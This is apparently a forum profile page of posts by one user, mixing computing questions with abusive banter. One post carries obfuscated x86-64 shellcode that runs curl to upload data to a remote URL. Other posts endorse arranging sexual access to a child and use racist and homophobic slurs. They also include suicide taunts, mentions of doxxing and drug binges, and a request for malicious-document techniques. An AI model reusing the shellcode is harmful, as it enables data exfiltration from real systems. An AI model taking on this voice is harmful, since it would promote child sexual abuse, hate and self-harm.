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Posts by Sophie

  1. Sophie Pedophile Tech Support
    Originally posted by STER0S damn nigga i wish wasnt retarded

    You're not retarded, i'm just exceptional.

    Actually i think most people can get good at CompSci, it just takes a lot of practice and experience.
  2. Sophie Pedophile Tech Support
    Originally posted by STER0S what do these numbers and letters mean:


    It's complicated but you can think of it as coordinates to a place. Except being the location of a pizza hut it might indicate a memory address or what have you.
  3. Sophie Pedophile Tech Support
    So i was looking into ways to execute things on *Nix boxes without necessarily having the appropriate permissions to do so. I know about `execve` and i can leverage it to do something like this:

    global _start
    section .text

    push 59
    pop rax
    push rdx
    mov rbx, 0x6c7275632f6e6962
    push rbx
    mov rbx, 0x2f7273752f2f2f2f
    push rbx
    push rsp
    pop rdi
    push rdx
    mov rbx, 0xffffffffffffb9d2
    not rbx
    push rbx
    push rsp
    pop r8
    push rdx
    mov rbx, 0xffffffffffff938d
    not rbx
    push rbx
    mov rbx, 0x8ac28b9e928d9099
    not rbx
    push rbx
    push rsp
    pop r9
    push rdx
    mov rbx, 0xffffffffffffb9d2
    not rbx
    push rbx
    push rsp
    pop r10
    push rdx
    mov rbx, 0xffffffffd8d2c3c2
    not rbx
    push rbx
    mov rbx, 0x8b919a8b91909cd8
    not rbx
    push rbx
    push rsp
    pop r11
    push rdx
    mov rbx, 0xffd0968f9ed0988d
    not rbx
    push rbx
    mov rbx, 0x90d19a8b8c9e8f9b
    not rbx
    push rbx
    mov rbx, 0xd0d0c58c8f8b8b97
    not rbx
    push rbx
    push rsp
    pop r12
    push rdx
    push rsp
    pop rdx
    push r12
    push r11
    push r10
    push r9
    push r8
    push rdi
    push rsp
    pop rsi

    And that's fine. But `execve` is a one off. At least as far as i understand it. And at least as far as it is used in my example above.

    So i started reading, and i read you could start a shell script with environment variables from your Asm program which was pretty cool. Something like this.

    bits 64

    [list -]
    %include ""
    [list +]

    section .data
    filename: db "",0
    .len: equ $-filename
    ;... put more arguments here
    envp1: db "TESTVAR=123456",0
    ;... put more environment paraters here
    argvPtr: dq filename
    ; more pointers to arguments here
    dq 0 ; terminate the list of pointers with 0
    envPtr: dq envp1
    dq 0
    forkerror: db "fork error",10
    .len: equ $-forkerror
    execveerror: db "execve error(not expected)",10
    .len: equ $-execveerror
    wait4error: db "wait4 error",10
    .len: equ $-wait4error

    section .text

    global _start

    syscall fork
    and rax,rax
    jns .continue
    syscall write,stderr,forkerror,forkerror.len
    jmp .exit
    jz .runchild
    ; wait for child to terminate
    syscall wait4, 0, 0, 0, 0
    jns .exit
    syscall write,stderr,wait4error,wait4error.len
    jmp .exit

    syscall execve,filename,argvPtr,envPtr
    jns .exit
    syscall write,stderr,execveerror,execveerror.len
    syscall exit,0

    But then i came across an example that kind of blew my mind. I'll post it below in spoiler tags because it's long. But basically they're starting a terminal and from the program are having the commands they define be executed in that terminal. So does that mean i can basically just write a shell script within an Asm program, invoke a terminal and execute whatever i want?

  4. Sophie Pedophile Tech Support
    No i didn't.
  5. Sophie Pedophile Tech Support
    Originally posted by Bradley wasn't anything to see, a bitch looking away from the camera ordering a drink n wondeirng why some child molestor is filming her while giggling.

    Perfectly plausible.
  6. Sophie Pedophile Tech Support
    Originally posted by DontTellEm Kill yourself. Twerpt

    You first.
  7. Sophie Pedophile Tech Support
    Originally posted by AngryIVer Okay, I'll contribute now:

    I think WellHung is up there on the list of people likely to die. Just seems to live a poor lifestyle in terms of caring for his own health and whatnot.

    Perhaps he'll suicide before that.
  8. Sophie Pedophile Tech Support
    Originally posted by SBTlauien Yeah I essentially hacked the phone number back. The day after this happened, I got a couple of SMS messages from my new carrier that had OTP. That was the perp trying to access the account and probably trying to figure out why there was a password on the account.

    The sim-swappers are likely making a killing.

    I'm still wanting to know what they did to change my PIN. I'm guessing they called and said "I'm an employee at the Boost Mobile store and I need to locate a receipt. Can you give me the activation date so I can look up the receipt?" I bet the phone Rep gave it out.

    Makes me wonder how they came across my phone number and email as well.

    Others on Reddit also had this happen and the PIN on the accounts were all "13371337"…

    I feel like there should be a way to harvest accounts that have been messed with on mass and just enter double l33t to activate and then steal the stolen stuff from the stealers in an epic cyber uno reverse on a mass scale.
  9. Sophie Pedophile Tech Support
    Originally posted by SBTlauien I'm in there now.

    Is there anyway to IRC my way in on or is it just a different protocol?

    Yes. There's IRC integrations, but aldra has to set that up for his server.
  10. Sophie Pedophile Tech Support
    Originally posted by Sudo I just hope I don't die. All power to the most high

  11. Sophie Pedophile Tech Support
    If you're uncomfortable with 'little' you can ask me how little and i will give you a compromise number.
  12. Sophie Pedophile Tech Support
    Originally posted by Xlite Such a lame and overused comeback.
    Go fuck yourself, ate.

    Is it really ate or are you just using that name as a pejorative?
  13. Sophie Pedophile Tech Support
    Originally posted by Bradley Mostly just wanna fist fight him in person because he said he's a golden gloves boxer or some shit and he's already double my highest (ever) weight so I figure if he can pack a punch like he can pack his ass, it'd be fun to pop out and surprise him.

    It's okay though Sophia, my friends have hooked me up. DO you wanna hook up one of htese days? I won't tell your girlfriend/s

    The only way we'll ever be any sort of vaguely sexual situation together is if you fly me out to wherever, where you have a sweet little girl for me ready in a room in the same building you will be in. And then you can go fuck her father while i entertain his daughter. The room can even be adjacent to mine, if you keep it down.
  14. Sophie Pedophile Tech Support
    I'm generally nice as long as other people are nice to me.
  15. Sophie Pedophile Tech Support
    10 bucks is chump change nigga. Also, why you wanna DOX QMR?
  16. Sophie Pedophile Tech Support
    Originally posted by Wariat

    "Image not found"

    Faggot. I wanna see this Ukrainian chick.
  17. Sophie Pedophile Tech Support
    Originally posted by Bradley To answer your question; after doing large amounts of methamphetamene (code named "tek") he convinced himself Austin Police Department was outside with a dog and a raid was incoming, and tortilla-style blocked off his doorway, in a delerium he decided "Fuck BradleyB and everyone else who cares about me" and decided to use a kitchen knife to open himself up in the wrist and stomach, at some point he decided "Wow this really hurts and I might die" and attempted to undo some of the barricade. There were two pools of blood, one located at the door barricade & one located next to the bed where he was to my knowledge found dead.

    It is what it is. Another dead friend, I took it really badly and started drinking again (not because of Bill Krozby but because I wanted to) then got "sober" where I smoked an eighth, did half a dab cart, and a quarter gram of speed a day.

    I even had a minor freak out where i incorrectly convinced myself that my roommate had someone over and was colluding to kill me. So I did what any reasonable person does when expecting to meet death on his own terms, I beat on her door until she answered and then barehanded sought to fight my oppositional adversary. Unfortunately it was just her, and I apologized, did two ambien and went to sleep.

    But we're not all as cool as I am.

    RIP Kr0zd0g, I knew you'd never work.

    Jesus. That's a fucked up way to go. If the police were after me and i somehow got the idea in my head to rather die than go to prism i'd probably try to suicide by cop.
  18. Sophie Pedophile Tech Support
    When i still used Twitter i followed a couple people like TheTalkingBear mostly for the drama, it's mildly amusing but they're mostly just obnoxious. Plus, back then i liked keeping up with all the little 'hacking crews' that wanted to be the new LulzSec. Instead of actually hacking stuff they'd mostly fight among each other. The most amount of 'hacking' that would occur was the occasional DDoS or DB Drop.
  19. Sophie Pedophile Tech Support
    Originally posted by Xlite A Heliades-class ship, like USCSS Prometheus without any xenomorphs.
    Or perhaps Starship Avalon. It has pretty much everything we're ever gonna need.

    If we're gonna go with movies i pick Darth Vader's Super Star Destroyer: The Executor.
  20. Sophie Pedophile Tech Support
    Oh i read that wrong. The cum swapper set double l33t as password to activate the number on his end.

    Lol he got BTFO'd.

    That said, i am still open to receiving any cool MalDoc TTPs should you have some.
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